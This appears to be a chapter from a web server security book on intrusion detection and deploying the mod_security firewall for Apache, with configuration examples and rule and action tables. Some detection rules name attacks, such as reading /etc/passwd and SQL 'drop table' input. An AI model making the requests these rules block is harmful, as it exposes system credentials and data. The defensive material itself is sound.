In spite of all your efforts to secure a web server, there is one part you do not and usually cannot control in its entirety: web applications. Web application design, programming, and maintenance require a different skill set. Even if you have the skills, in a typical organization these tasks are usually assigned to someone other than the system administrator. But the problem of ensuring adequate security remains. This final chapter suggests ways to secure applications by treating them as black boxes and examining the way they interact with their environment. The techniques that do this are known collectively as intrusion detection.
This chapter covers the following:
Evolution of intrusion detection
Basic intrusion detection principles
Web application firewalls
mod_security
Intrusion detection has been in use for many years. Its purpose is to detect attacks by looking at the network traffic or by looking at operating system events. The term intrusion prevention is used to refer to systems that are also capable of preventing attacks.
Today, when people mention intrusion detection, in most cases they are referring to a network intrusion detection system (NIDS). An NIDS works on the TCP/IP level and is used to detect attacks against any network service, including the web server. The job of such systems, the most popular and most widely deployed of all IDSs, is to monitor raw network packets to spot malicious payload. Host-based intrusion detection systems (HIDSs), on the other hand, work on the host level. Though they can analyze network traffic (only the traffic that arrives to that single host), this task is usually left to NIDSs. Host-based intrusion detection is mostly concerned with the events that take place on the host (such as users logging in and out and executing commands) and the system error messages that are generated. An HIDS can be as simple as a script watching a log file for error messages, as mentioned in Chapter 8. Integrity validation programs (such as Tripwire) are a form of HIDS. Some systems can be complex: one form of HIDS uses system call monitoring on a kernel level to detect processes that behave suspiciously.
Using a single approach for intrusion detection is insufficient. Security information management (SIM) systems are designed to manage various security-relevant events they receive from agents, where an agent can listen to the network traffic or operating system events or can work to obtain any other security-relevant information.
Because many NIDSs are in place, a large effort was made to make the most of them and to use them for web intrusion detection, too. Though NIDSs work well for the problems they were designed to address and they can provide some help with web intrusion detection, they do not and cannot live up to the full web intrusion detection potential for the following reasons:
NIDSs were designed to work with TCP/IP. The Web is based on the HTTP protocol, which brings a completely new vocabulary with its own set of problems and challenges, different from those of TCP/IP.
The real problem is that web applications are not simple users of the HTTP protocol. Instead, HTTP is only used to carry the application-specific data. It is as though each application builds its own protocol on top of HTTP.
Many new protocols are deployed on top of HTTP (think of Web Services, XML-RPC, and SOAP), pushing the level of complexity further up.
Other problems, such as the inability of an NIDS to see through encrypted SSL channels (which most web applications that are meant to be secure use) and the inability to cope with a large amount of web traffic, make NIDSs insufficient tools for web intrusion detection.
Vendors of NIDSs have responded to the challenges by adding extensions to better understand HTTP. The term deep-inspection firewalls refers to systems that make an additional effort to understand the network traffic on a higher level. Ultimately, a new breed of IDSs was born. Web application firewalls (WAFs), also known as web application gateways, are designed specifically to guard web applications. Designed from the ground up to support HTTP and to exploit its transactional nature, web application firewalls often work as reverse proxies. Instead of going directly to the web application, a request is rerouted to go to a WAF first and only allowed to proceed if deemed safe.
Web application firewalls were designed from the ground up to deal with web attacks and are better suited for that purpose. NIDSs are better suited for monitoring on the network level and cannot be replaced for that purpose.
Though most vendors are focusing on supporting HTTP, the concept of application firewalls can be applied to any application and protocol. Commercial products have become available that act as proxies for other popular network protocols and for popular databases. (Zorp, at http://www.balabit.com/products/zorp/, available under a commercial and open source license, is one such product.)
Learn more about intrusion detection to gain a better understanding of common problems. I have found the following resources useful:
“Intrusion Detection FAQ” by SANS (http://www.sans.org/resources/idfaq/)
Managing Security with Snort & IDS Tools by Kerry J. Cox and Christopher Gerg (O’Reilly)
There is sometimes controversy as to whether this approach to increasing security is the correct one to pursue. A common counterargument is that web intrusion detection does not solve the real problem, and that it is better to go straight to the source and fix weak web applications. I generally agree with this opinion, but reality prevents us from abandoning IDS techniques:
Achieving 100-percent security is impossible because we humans have limited capabilities and make mistakes.
Even attempting to approach 100-percent security is rare. In my experience, those who direct application development usually demand features, not security. Attitudes are changing, but slowly.
A complex system always contains third-party products whose quality (security-wise) is unknown. If the source code for the products is unavailable, then you are at the mercy of the vendor to supply the fixes.
We must work with existing vulnerable systems.
As a result, I recommend we raise awareness about security among management and developers. Since awareness will come slowly, do what you can in the meantime to increase security.
I already covered one form of web intrusion detection in Chapter 8. Log-based web intrusion detection makes use of the fact that web servers produce detailed access logs, where the information about every request is kept. It is also possible to create logs in special formats to control which data is collected. This cost-effective method introduces intrusion detection to a system but there is a drawback. Log-based web intrusion detection is performed only after transactions take place; therefore, attack prevention is not possible. Only detection is. If you can live with that (it is a valid decision and it depends on your threat model), then you only need to take a few steps to implement this technique:
Make sure logging is configured and takes place on all web servers.
Optionally reconfigure logging to log more information than that configured by default.
Collect all logs to a central location.
Implement scripts to examine the logs regularly, in real time or in batch mode (e.g., daily).
That is all there is to it. (Refer to Chapter 8 for a detailed discussion.)
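As a sketch of the first two steps (the format shown is the standard Apache combined format; the paths are illustrative, and Chapter 8 covers richer custom formats):

# Ensure detailed logging takes place on every web server
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
CustomLog /var/www/logs/access_log combined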
With real-time intrusion detection, not only can you detect problems, but you can react to them as well. Attack prevention is possible, but it comes with a price tag of increased complexity and more time required to run the system. Most of this chapter discusses the ways of running real-time web intrusion detection. There are two approaches:
One network node screens HTTP traffic before it reaches the destination.
An intrusion detection agent is embedded within the web server.
Which of these two you choose depends on your circumstances. The web server-based approach is easy to implement since it does not mandate changes to the network design and configuration. All that is needed is the addition of a module to the web server. But if you have many web servers, and especially if the network contains proprietary web servers, then having a single place from which to perform intrusion detection can be the more efficient approach. Though network-based web IDSs typically perform full separation of clients and servers, web server-based solutions can be described more accurately as separating clients from applications, with servers left unprotected in the middle. In this case, therefore, network-based protection is better because it can protect from flaws in web servers, too.
With Apache and mod_security you can choose either approach to real-time web intrusion detection. If network-based web intrusion detection suits your needs best, then you can build such a node by installing an additional Apache instance with mod_security to work in a reverse proxy configuration. (Reverse proxy operation is discussed in Chapter 9.) Aside from initial configuration, the two modes of operation are similar. The rest of this chapter applies equally to both.
Later in this chapter, I will present a web intrusion detection solution based on open source components. The advantage of using open source components is they are free and familiar (being based on Apache). Products from the commercial arena have more features, and they have nice user interfaces that make some tasks much easier. Here I will present the most important aspects of web IDSs, even if some features are present only in commercial products. I expect the open source products to catch up, but at this point a discussion of web intrusion detection cannot be complete without including features available only in commercial products. The following sections describe some common intrusion detection features.
If you read through various RFCs, you may detect a recurring theme. Most RFCs recommend that implementations be conservative about how they use protocols, but liberal in what they accept from others. Web servers behave this way too, but such behavior leaves the door wide open for all sorts of attacks. Almost all IDSs perform some sort of sanity check on incoming requests and refuse to accept anything that is not in accordance with the HTTP standard. Furthermore, they can narrow down the features to those that are acceptable to the application and thus reduce the attack surface area.
If you have ever worked to develop a firewall policy, you may have been given (good) advice to first put rules in place to deny everything, and then proceed to allow what is safe. That is a positive security model. On the other side is a negative security model, in which everything that is not dangerous is allowed. The two approaches each ask a question:
Positive security model: What is safe?
Negative security model: What is dangerous?
A negative security model is used more often. You identify a dangerous pattern and configure your system to reject it. This is simple, easy, and fun, but not foolproof. The concept relies on you knowing what is dangerous. If there are aspects of the problem you are not aware of (which happens from time to time) then you have left a hole for the attacker to exploit.
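For example, using the mod_security rule syntax covered later in this chapter, a negative-model defense is just a list of rules, one per known-dangerous pattern (the pattern here is illustrative):

# Reject any request containing "drop table" (with any
# whitespace in between) anywhere in its content
SecFilter drop[[:space:]]+table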
A positive security model (also known as a white-list model) is a better approach to building policies and works well for firewall policy building. In the realm of web application security, a positive security model approach boils down to enumerating every script in the application. For each script in the list, you need to determine the following:
Allowed request methods (e.g., GET/POST or POST only)
Allowed Content-Type
Allowed Content-Length
Allowed parameters
Which parameters are mandatory and which are optional
The type of every parameter (e.g., text or integer)
Additional parameter constraints (where applicable)
This is what programmers are supposed to do but frequently do not. Using the positive security model is better if you can afford to spend the time to develop it. One difficult aspect of this approach is that the application model changes as the application evolves. You will need to update the model every time a new script is added to the application or if an existing one changes. But it works well to protect stable, legacy applications that no one maintains anymore.
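As an illustration of the enumeration above, here is a minimal positive-model sketch for a single hypothetical script (/app/search.php, with one mandatory parameter, q), written with the mod_security directives covered later in this chapter; the names and constraints are assumptions to adapt to your application:

<Location /app/search.php>
    # Allow only the GET and POST request methods
    SecFilterSelective REQUEST_METHOD !^(GET|POST)$
    # Require q to be 1-64 characters of letters, digits, or spaces
    SecFilterSelective ARG_q !^[a-zA-Z0-9 ]{1,64}$
</Location>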
Automating policy development can ease problems:
Some IDSs can observe the traffic and use it to build the policy automatically. Some can do it in real time.
With white-list protection in place, you may be able to mark certain IP addresses as trusted, and configure the IDS to update the policy according to the observed traffic.
If an application is built with a comprehensive set of regression tests (to simulate correct behavior), playing the tests while the IDS is watching will result in a policy being created automatically.
Rule-based IDSs comprise the majority of what is available on the market. In principle, every request (or packet in the case of NIDS) is subject to a series of tests, where each test consists of one or more inspection rules. If a test fails, the request is rejected as invalid.
Rule-based IDSs are easy to build and use and are efficient when used to defend against known problems or when the task is to build a custom defense policy. But since they must know about the specifics of every threat to protect from it, these tools must rely on using extensive rule databases. Vendors maintain rule databases and distribute their tools with programs to update IDS installations automatically.
This approach is unlikely to be able to protect custom applications or to protect from zero-day exploits (exploits that attack vulnerabilities not yet publicly known). This is where anomaly-based IDSs work better.
The idea behind anomaly-based protection is to build a protection layer that will observe legal application traffic and then build a statistical model to judge the future traffic against. In theory, once trained, an anomaly-based system should detect anything out of the ordinary. With anomaly-based protection, rule databases are not needed and zero-day exploits are not a problem. Anomaly-based protection systems are difficult to build and are thus rare. Because users do not understand how they work, many refuse to trust such systems, making them less popular.
A frequent web security problem occurs where the web programming model is misunderstood and programmers think the browser can be trusted. If that happens, the programmers may implement input validation in the browser using JavaScript. Since the browser is just a simple tool under control of the user, an attacker can bypass such input validation easily and send malformed input directly to the application.
A correct approach to handling this problem is to add server-side validation to the application. If that is impossible, another way is to add an intermediary between the client and the application and to have the intermediary reinterpret the JavaScript embedded in the web page.
The stateless nature of the HTTP protocol has many negative impacts on web application security. Sessions can and should be implemented on the application level, but for many applications the added functionality is limited to fulfilling business requirements other than security. Web IDSs, on the other hand, can throw their full weight into adding various session-related protection features. Some of the features include:
At most web sites, you can start browsing from any site URL that is known to you. This is often convenient for attackers and inconvenient for defenders. An IDS that understands sessions will realize the user is making his first request and redirect him back to the default entry point (possibly logging the event).
Being able to distinguish one session from another opens interesting possibilities: for example, it becomes possible to watch the rate at which requests are made and the way users navigate through the application going from one page to another. Looking at the behavior of just one user, it becomes much easier to detect intrusion attempts.
Brute-force attacks normally go undetected in most web applications. With state management in place, an IDS tracks unusual events (such as login failures), and it can be configured to take action when a threshold is reached. It is often convenient to slow down future authentication attempts slightly, not enough for real users to notice but enough to practically stop automated scripts. If an authentication script takes 50 milliseconds to make a decision, a script can make around 20 attempts per second. If you introduce a delay of, say, one second, that will bring the speed to under one attempt per second. That, combined with an alert to someone to investigate further, would provide a decent defense. (A configuration sketch follows this list.)
Sessions can be expired after the session timeout is reached, requiring users to re-authenticate. Users can also be logged out after a period of inactivity.
In most cases, session hijacking results in a change of IP address and some other request data (that is, request headers are likely to be different). A stateful monitoring tool can detect the anomalies and prevent exploitation from taking place. The recommended action to take is to terminate the session, ask the user to re-authenticate, and log a warning.
Some tools can be strict and only allow users to follow the links that have been given in the previous response. This seems like an interesting feature but can be difficult to implement. One problem with it is that it prevents the user from using more than one browser window with the application. Another problem is that it can cause incompatibilities with applications using JavaScript to construct links dynamically.
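To make the brute-force defense mentioned above concrete, here is a minimal sketch using the mod_security pause action (listed later in Table 12-3). The login script path is a hypothetical example, and note that mod_security alone applies the delay to every matching request rather than only after a failure threshold; threshold logic would need the exec action or an external monitoring script.

<Location /app/login.php>
    # Delay every login POST by one second (1000 ms), log it,
    # and let the request proceed
    SecFilterSelective REQUEST_METHOD ^POST$ pause:1000,log,pass
</Location>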
One area where network-based IDSs have had trouble with web traffic is evasion techniques (see Chapter 10). The problem is that there are many ways to alter incoming (attack) data so that it keeps its original meaning for the application that interprets it, yet is modified sufficiently to sneak under the IDS radar. This is an area where dedicated web IDSs provide significant improvement. For example, just by looking at whole HTTP requests at a time, an entire class of attacks based on request fragmentation is avoided. And because they understand HTTP well and can separate dynamic requests from requests for static resources (and thus choose not to waste time protecting static requests that cannot be compromised), they can afford to apply many different anti-evasion techniques that would prove too time consuming for NIDSs.
Information leak prevention is a fancy name for response monitoring. In principle it is identical to request monitoring, and its goal is to watch the output for suspicious patterns and prevent the response from reaching the client when such a pattern is detected. The most likely candidates for patterns in output are credit card numbers and social security numbers. Another use for this technique is to watch for signs of successful intrusions, as I will demonstrate later in the chapter.
It is impossible to prevent information leakage by a determined and skillful attacker, since he will always be able to encode the information in such a way as to prevent detection by an IDS. Still, this technique can help when the attacker does not have full control over the server but instead tries to exploit a weakness in the application.
mod_security is a web application firewall module I developed for the Apache web server. It is available under the open source GPL license, with commercial support and commercial licensing as an option. I originally designed it as a means to obtain a proper audit log, but it grew to include other security features. There are two versions of the module, one for each major Apache branch, and they are almost identical in functionality. In the Apache 2 version, mod_security uses the advanced filtering API available in that version, making interception of the response body possible. The Apache 2 version is also more efficient in terms of memory consumption. In short, mod_security does the following:
Intercepts HTTP requests before they are fully processed by the web server
Intercepts the request body (e.g., the POST payload)
Intercepts, stores, and optionally validates uploaded files
Performs anti-evasion actions automatically
Performs request analysis by processing a set of rules defined in the configuration
Intercepts HTTP responses before they are sent back to the client (Apache 2 only)
Performs response analysis by processing a set of rules defined in the configuration
Takes one of the predefined actions or executes an external script when a request or a response fails analysis (a process called detection)
Depending on the configuration, a failed request may be prevented from being processed, and a failed response may be prevented from being seen by the client (a process called prevention)
Performs audit logging
In this section, I present a deployment guide for mod_security, but the principles behind it are the same and can be applied to any web application firewall. For a detailed reference manual, visit the project documentation area at http://www.modsecurity.org/documentation/.
The basic ingredients of every mod_security configuration are:
Anti-evasion features
Encoding validation features
Rules (to detect invalid requests)
Actions (to handle invalid requests)
The purpose of this section is to present enough information about how these ingredients interact with each other to enable you to configure and use mod_security. The subsequent sections will cover some advanced topics to give you more of the insight needed in specific cases.
To install mod_security, you need to compile it using the apxs tool, as you would any other module. Some contributors provide system-specific binaries for download, and I put links to their web sites at http://www.modsecurity.org/download/. If you have installed Apache from source, apxs will be with the other Apache binaries in the /usr/local/apache/bin/ folder. If you cannot find the apxs tool on your system, examine the vendor-provided documentation to learn how to add it. For example, on Red Hat systems apxs is a part of the httpd-devel package.
Change to the correct source code directory (there is one directory for each Apache branch) and execute the following commands:
# /usr/local/apache/bin/apxs -cia mod_security.c
# /usr/local/apache/bin/apachectl stop
# /usr/local/apache/bin/apachectl start
After having restarted Apache, mod_security will be active but disabled. I recommend the following configuration to enable it with minimal chances of denying legitimate requests. You can enable mod_security with fewer configuration directives; most options have default settings that are the same as the following configuration, but I prefer to configure things explicitly rather than wonder whether I understand what the default settings are:
# Enable mod_security
SecFilterEngine On
# Retrieve request payload
SecFilterScanPOST On
# Reasonable automatic validation defaults
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat Off
SecFilterNormalizeCookies Off
SecFilterCheckUnicodeEncoding Off
# Accept almost all byte values
SecFilterForceByteRange 1 255
# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403
# Only record the relevant information
SecAuditEngine RelevantOnly
SecAuditLog /var/www/logs/audit_log
# Where to store temporary and intercepted files
SecUploadDir /var/www/logs/files/
# Do not store intercepted files for the time being
SecUploadKeepFiles Off
# Use 0 for the debug level in production
# and 4 for testing
SecFilterDebugLog /var/www/logs/modsec_debug_log
SecFilterDebugLevel 4
Starting from the top, this configuration data enables mod_security and tells it to intercept request bodies, configures settings for various encoding validation and anti-evasion features (explained below), configures the default action list to handle invalid requests, and configures the two log types.
After adding the configuration data to your httpd.conf file, make a couple of requests to the web server and examine the audit_log and modsec_debug_log files. Without any rules configured, there won't be much output in the debug log, but at least you will be certain the module is active.
You must understand what mod_security does, and in what order, for every request. Generally, processing consists of four phases: initialization, input analysis, output analysis, and logging.
At the beginning of the initialization phase, mod_security determines whether it should process the request. No processing will be performed unless the module is explicitly enabled in the configuration (via SecFilterEngine On). Similarly, if the module is configured only to process dynamic requests (via SecFilterEngine DynamicOnly) and the current request is for a static resource, processing will end immediately. If processing is to continue, the module will initialize its structures, read in the complete request body (if one is present and if request body buffering is enabled), and perform initial request validation as defined in the configuration. The initial request validation covers the whole of the request: the first line, the headers, and the parameters. If any part of the request fails validation, the request will be rejected. This will happen even if the default action (configured using the SecFilterDefaultAction directive) is configured to allow requests to proceed in case of a rule match. This exception is necessary for mod_security to have consistent internal structures to base the rest of processing on. If you do not want a request to be rejected under any circumstances, then disable all encoding validation options.
In the input analysis phase, the rule engine is activated to apply rules to the requests and perform actions specified in the configuration. If the request passes this phase, Apache will call the request handler to process the request.
The output analysis phase exists only in the Apache 2 version of the module and only occurs if output buffering is enabled. In that case, mod_security intercepts output and stores it until the entire response is generated. After that, the rule engine is activated again, but this time to analyze the response data.
The logging phase is the last to take place. This phase does not depend on the previous phases. For example, the mod_security rule engine may be turned off but the audit engine may continue to work. Similar to what takes place at the beginning of the initialization phase, the first task performed at the beginning of the logging phase is to determine whether logging should take place, based on your configuration.
As mentioned in Chapter 10, evasion techniques can be used to sneak in malicious payload undetected by web intrusion detection software. To counter that, mod_security performs the following anti-evasion techniques automatically:
Decodes URL-encoded text (e.g., changing %26 to &)
Converts Windows folder separation characters to Unix folder separation characters (\ to /)
Removes self-references (converting /./ to /)
Removes redundant folder separation characters (e.g., changing // to /)
Changes content to lowercase
Converts null bytes to spaces
In some ways, encoding validation can be treated as anti-evasion. As mentioned previously, web servers and applications are often very flexible and allow invalid requests to be processed anyway. Using one of the following encoding validation options, it is possible to restrict what is accepted:
Certain invalid URL encodings (e.g., %XV, as explained in Chapter 10) can be used to bypass application security mechanisms. When URL encoding validation is turned on for mod_security, requests will be rejected if either of the two possible invalid encoding situations is encountered: invalid hexadecimal numbers or missing hexadecimal numbers.
Invalid or overlong Unicode characters are often dangerous. Turning on Unicode encoding validation can detect three types of problems: invalid characters, missing bytes, and overlong characters. This type of validation is off by default since many applications do not understand Unicode, and it is not possible to detect whether they do by looking at a request. Applications that are not Unicode aware sometimes use character combinations that are valid but that resemble special Unicode characters. Unicode validation would interpret such combinations as attacks and lead to false positives.
This option enforces strict cookie formats. It is disabled by default.
Cookie values are often URL encoded though such encoding is not mandated by the specification. Performing normalization (which includes all anti-evasion actions) on the value allows a rule to see through the encoding. However, if URL encoded cookies are not used, false positives are possible. Enable cookie value normalization only if appropriate.
Of all possible byte values (0-255), some applications use only a small range. For example, applications designed only for the English-speaking population might only use values between 32 and 126, inclusive. Restricting the bytes that can be used in a request to a small range can be beneficial as it reduces the chances of a successful buffer overflow attack. This validation option is controlled with the SecFilterForceByteRange directive (as described in Section 12.2.5.2).
The best part of mod_security is its flexible rule engine. In the simplest form, a rule requires only a single keyword. The SecFilter directive performs a broad search against the request parameters, as well as against the request body for POST requests:
SecFilter KEYWORD
If the keyword is detected, the rule will be triggered and will cause the default action list to be executed.
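For example, the following rule (a classic illustration rather than a complete defense) triggers on any attempt to reference the system password file anywhere in the request:

SecFilter /etc/passwd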
The keyword is actually a regular expression pattern. Using a simple string, such as 500, will find its occurrence anywhere in the search content. To make full use of mod_security, learn about regular expressions. If you are unfamiliar with them, I suggest http://www.pcre.org/pcre.txt as a good starting point. If you prefer a book, check out Mastering Regular Expressions by Jeffrey E. F. Friedl (O'Reilly), which is practically a regular expression reference guide.
Here are a couple of points I consider important:
Some characters have special meanings in regular expressions. The pattern 1.1 matches the string 1.1, but it also matches 101 because a dot is meant to represent any one character. To match a dot in the string, you must escape it in the pattern by preceding it with a backslash character, like this: 1\.1.
If you want to match a whole string, you must use characters that are special to the regular expression engine, as in ^1\.1$. The ^ character matches the beginning of the string, while the $ character matches the end. Without them, 1\.1 would match 1.1, but it would also match 1001.100.
When an exclamation mark is used as the first character in a pattern, it negates the pattern. For example, the pattern !attack causes a rule match if the searched string does not contain the pattern attack.
I will demonstrate what can be done with regular expressions with a pattern you will find useful in the real world: ^[0-9]{1,9}$. This pattern matches only strings consisting entirely of digits, from one to nine of them.
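Combined with negation, this pattern makes a handy positive-model check. As a sketch (the parameter name id is an assumption), the following rejects any request whose id parameter is not a one-to-nine-digit number:

SecFilterSelective ARG_id !^[0-9]{1,9}$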
Apache 1 and Apache 2 use different regular expression engines. The regular expression engine of the Apache 1 branch is not well documented. It works mostly as you would expect, but there are slight differences from the Apache 2 engine. Apache 2 bundles the PCRE engine (http://www.pcre.org), which is well documented and widely used in other open source products (such as PHP and Python). If you normally write regular expressions for one Apache branch, do not expect the other branch to interpret the same expressions in the same way.
Although broad rules are easy to write, they usually do not work well in real life. Their use significantly increases the chances of introducing false positives and reducing system availability to its legitimate users (not to mention the annoyance they cause). A much better approach to rule design is to consider the impact and only apply rules to certain parts of HTTP requests. This is what SecFilterSelective is for. For example, the following rule will look for the keyword only in the query string:
SecFilterSelective QUERY_STRING KEYWORD
The QUERY_STRING variable is one of the supported variables. The complete list is given in Table 12-1 (standard variables available for use with mod_rewrite or CGI scripts) and Table 12-2 (extended variables specific to mod_security). In most cases, the variable names are the same as those used by mod_rewrite and the CGI specification.
Table 12-1. Standard rule variables

Variable name | Description
---|---
REMOTE_ADDR | IP address of the client.
REMOTE_HOST | Host name of the client, when available.
REMOTE_USER | Authenticated username, when available.
REMOTE_IDENT | Remote username (provided by the identd daemon, when available).
REQUEST_METHOD | Request method (e.g., GET, POST).
SCRIPT_FILENAME | Full system path for the script being executed.
PATH_INFO | The extra part of the URI given after the script name. For example, if the URI is /view.php/5, the extra part is /5.
QUERY_STRING | The part of the URI after the question mark, when available (e.g., id=5).
AUTH_TYPE | The string Basic or Digest, when available.
DOCUMENT_ROOT | Path to the document root, as specified with the DocumentRoot directive.
SERVER_ADMIN | The email address of the server administrator, as specified with the ServerAdmin directive.
SERVER_NAME | The hostname of the server, as specified with the ServerName directive.
SERVER_ADDR | The IP address of the server where the request was received.
SERVER_PORT | Server port where the request was received.
SERVER_PROTOCOL | The protocol specified in the request (e.g., HTTP/1.1).
SERVER_SOFTWARE | Apache version, as configured with the ServerTokens directive.
TIME_YEAR | Current year (e.g., 2004).
TIME_MON | Current month as a number (e.g., 10 for October).
TIME_DAY | Current day of month as a number.
TIME_HOUR | Current hour as a number in a 24-hour day (e.g., 17).
TIME_MIN | Current minute.
TIME_SEC | Current second.
TIME_WDAY | Current weekday as a number (e.g., 2 for Tuesday).
TIME | Current time as a combination of the individual elements listed above, in the form year, month, day, hour, minute, second (e.g., 20041026174436).
THE_REQUEST | Complete first line of the request (e.g., GET /view.php?id=5 HTTP/1.0).
REQUEST_URI | The second token on the request line (e.g., /view.php?id=5).
REQUEST_FILENAME | A synonym for SCRIPT_FILENAME.
Table 12-2. Extended rule variables

Variable Name | Description
---|---
POST_PAYLOAD | Gives access to the raw request body except for requests using the multipart/form-data encoding (required for file uploads).
HTTP_name | Value of the header name.
ENV_name | Value of the environment variable name.
ARG_name | Value of the parameter name.
ARGS | Gives direct access to a single string containing all parameters and their values, which is equal to the combined value of QUERY_STRING and POST_PAYLOAD.
ARGS_COUNT | Number of parameters in the request.
ARGS_NAMES | List of the names of all parameters given to the script.
ARGS_VALUES | List of the values of all parameters given to the script.
FILE_NAME_name | The filesystem name of the file contained in the request and associated with the script parameter name.
FILE_SIZE_name | The size of the file uploaded in the parameter name.
FILES_COUNT | Number of files contained in the request.
FILES_NAMES | List of the filesystem names of all files contained in the request.
FILES_SIZES | List of the sizes of all files.
HEADERS | List of all request headers, in the form "Name: Value".
HEADERS_COUNT | Number of headers in the request.
HEADERS_NAMES | List of the names of all headers in the request.
HEADERS_VALUES | List of the values of all headers in the request.
SCRIPT_UID | The uid of the owner of the script that will handle the request.
SCRIPT_GID | The gid of the group of the script that will handle the request.
SCRIPT_USERNAME | The username equivalent to the uid.
SCRIPT_GROUPNAME | The group name equivalent to the gid.
SCRIPT_MODE | Script permissions, in the standard Unix format, with four digits with a leading zero (e.g., 0755).
COOKIE_name | Value of the cookie name.
COOKIES_COUNT | Number of cookies in the request.
COOKIES_NAMES | List of the names of all cookies given to the script.
COOKIES_VALUES | List of the values of all cookies given to the script.
When using selective rules, you are not limited to examining one field at a time. You can separate multiple variable names with a pipe. The following rule demonstrates how to access named parts of the request, in this example, a parameter and a cookie:
# Look for the keyword in the parameter "authorized"
# and in the cookie "authorized". A match in either of
# them will trigger the rule.
SecFilterSelective ARG_authorized|COOKIE_authorized KEYWORD
If a variable is absent in the current request, it will be treated as empty. For example, to detect the presence of a variable, use the following format, which triggers execution of the default action list if the variable is not empty:
SecFilterSelective ARG_authorized !^$
A special syntax allows you to create exceptions. The following applies the rule to all parameters except the parameter html:
SecFilterSelective ARGS|!ARG_html KEYWORD
Finally, single rules can be combined to create more complex expressions. In my favorite example, I once had to deploy an application that had to be publicly available because our users were located anywhere on the Internet. The application had a powerful, potentially devastating administration account, and the login page for users and for the administrator was the same. It was impossible to use other access control methods to restrict administrative logins to an IP address range. Modifying the source code was not an option because we had no access to it. I came up with the following two rules:
SecFilterSelective ARG_username ^admin$ chain
SecFilterSelective REMOTE_ADDR !^192\.168\.254\.125$
The first rule triggers whenever someone tries to log in as an administrator (it looks for a parameter username with the value admin). Without the optional action chain being specified, the default action list would be executed. Since chain is specified, processing continues with execution of the second rule. The second rule allows the request to proceed if it is coming from a single predefined IP address (192.168.254.125). The second rule never executes unless the first rule is satisfied.
You can do many things when an invalid request is discovered. The SecFilterDefaultAction directive determines the default action list:
# Reject invalid requests with status 403
SecFilterDefaultAction deny,log,status:403
You can override the default action list by supplying a list of actions to individual rules as the last (optional) parameter:
# Only log a warning message when the KEYWORD is found
SecFilter KEYWORD log,pass
If you use the optional trailing parameter to specify per-rule actions, you must ensure all the actions you want to take place are listed. This is because the list you supply replaces the default action list; therefore, none of the default actions take place.
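For example, if you supply only log for a rule, the deny and status actions from the default list no longer apply and the request is let through; to both log and reject, spell out the whole list:

# Logged, but allowed through: the default deny was replaced
SecFilter KEYWORD log
# Logged and rejected: every desired action is listed
SecFilter KEYWORD log,deny,status:403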
The full list of supported actions is given in Table 12-3.
Table 12-3. mod_security action list

Action | Description
---|---
allow | Skip over the remaining rules and allow the request to be processed.
auditlog | Log the request to the audit log.
chain | Chain the current rule with the one that follows. Process the next rule if the current rule matches. This feature allows many rules to be used as one, performing a logical AND.
deny | Deny request processing.
exec:filename | Execute the external script specified by filename on rule match.
id:n | Assign a unique ID n to the rule. The ID will appear in the log. Useful when there are many rules designed to handle the same problem.
log | Log the rule match. A message will go into the Apache error log and into the audit log (if such logging is enabled).
msg:text | Assign a message text to the rule. The message will appear in the log.
noauditlog | Do not log the request to the audit log. All requests that trigger a rule will be written to the audit log by default (unless audit logging is completely disabled by configuration). This action should be used when you don't want a request to appear in the audit log (e.g., it may be too long and you do not need it).
nolog | Do not log the rule match.
pass | Proceed to the next rule in spite of the current rule match. This is useful when you want to perform some action but otherwise don't want to reject the request.
pause:n | Pause for n milliseconds before responding to the request.
redirect:url | Perform a redirection to the address specified by url when the rule matches.
setenv:name=value | Set the environment variable name to the given value.
skipnext:n | On rule match, skip the next n rules.
status:n | Configure the status n to be used when the request is denied.
There are three places where, depending on the configuration, you may find mod_security logging information:
mod_security debug log

The mod_security debug log, if enabled via the SecFilterDebugLevel and SecFilterDebugLog directives, contains a large number of entries for every request processed. Each log entry is associated with a log level, which is a number from 0 (no messages at all) to 4 (maximum logging). The higher the log level you specify, the more information you get in error logs. You normally need to keep the debug log level at 0 and increase it only when you are debugging your rule set. Excessive logging slows down server operation. Some of the messages from the debug log will make it into the Apache error log (even if you set the mod_security debug log level to 0). These are the messages that require an administrator's attention, such as information about requests being rejected.
mod_security audit log

When audit logging is enabled (using the SecAuditEngine and SecAuditLog directives), mod_security can record each request (and its body, provided request body buffering is enabled) and the corresponding response headers. (I expect future versions of mod_security will be able to log response bodies, too.) Whether information is recorded for all requests or only some depends on the configuration (see Chapter 8).
Here is an example of an error message resulting from invalid content discovered in a cookie:
[Tue Oct 26 17:44:36 2004] [error] [client 127.0.0.1] mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)" at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"] [uri "/cgi-bin/modsec-test.pl"] [unique_id bKjdINmgtpkAADHNDC8AAAAB]
The message indicates that the request was rejected (“Access denied”) with an HTTP 500 response because the content of the cookie sessionid matched the pattern !(^$|^[a-zA-Z0-9]+$). (The pattern allows a cookie to be empty, but if it is not, it must consist only of one or more letters and digits.)
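Working backward from the message, a rule along the following lines would produce it (a reconstruction, not necessarily the exact original; note the status:500 override matching the “code 500” in the message):

SecFilterSelective COOKIES_VALUES !(^$|^[a-zA-Z0-9]+$) deny,log,status:500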
In addition to the basic information presented in the previous sections, some additional (important) aspects of mod_security operation are presented here.
For each request, mod_security activities take place after Apache performs initial work on it but before the actual request processing starts. During the first part of the work, Apache sometimes decides the request can be fulfilled or rejected without going to the subsequent processing phases. When that happens, mod_security never executes. These occurrences are not cause for concern, but you need to know about them before you start wondering why something you configured does not work.
Here are some situations when Apache finishes early:
When the request contains a URL-encoded forward slash (%2f) or null-byte (%00) character in the script path (see Chapter 2).
When the request is determined to be invalid. (For example, if the request line is too big, as is the case with some Microsoft IIS worms that roam around.)
When the request can be fulfilled by Apache directly. This is the case with the TRACE method.
The performance of the rule database is directly related to how many rules are in the configuration. For all normal usage patterns, the number of rules is small, and thus, there is practically no impact on the request processing speed. The only serious impact comes from increased memory consumption in the case of file uploads and Apache 1, which is covered in the next section.
In some circumstances, requests that perform file upload will be slower. If you enable the feature to intercept uploaded files, there will be an additional overhead of writing the file to disk. The exact slowdown depends on the speed of the filesystem, but it should be small.
The use of mod_security results in increased memory consumption by the Apache web server. The increase can be very small, but it can also be very big in some rare circumstances. Understanding why it happens will help you avoid problems in those rare circumstances.
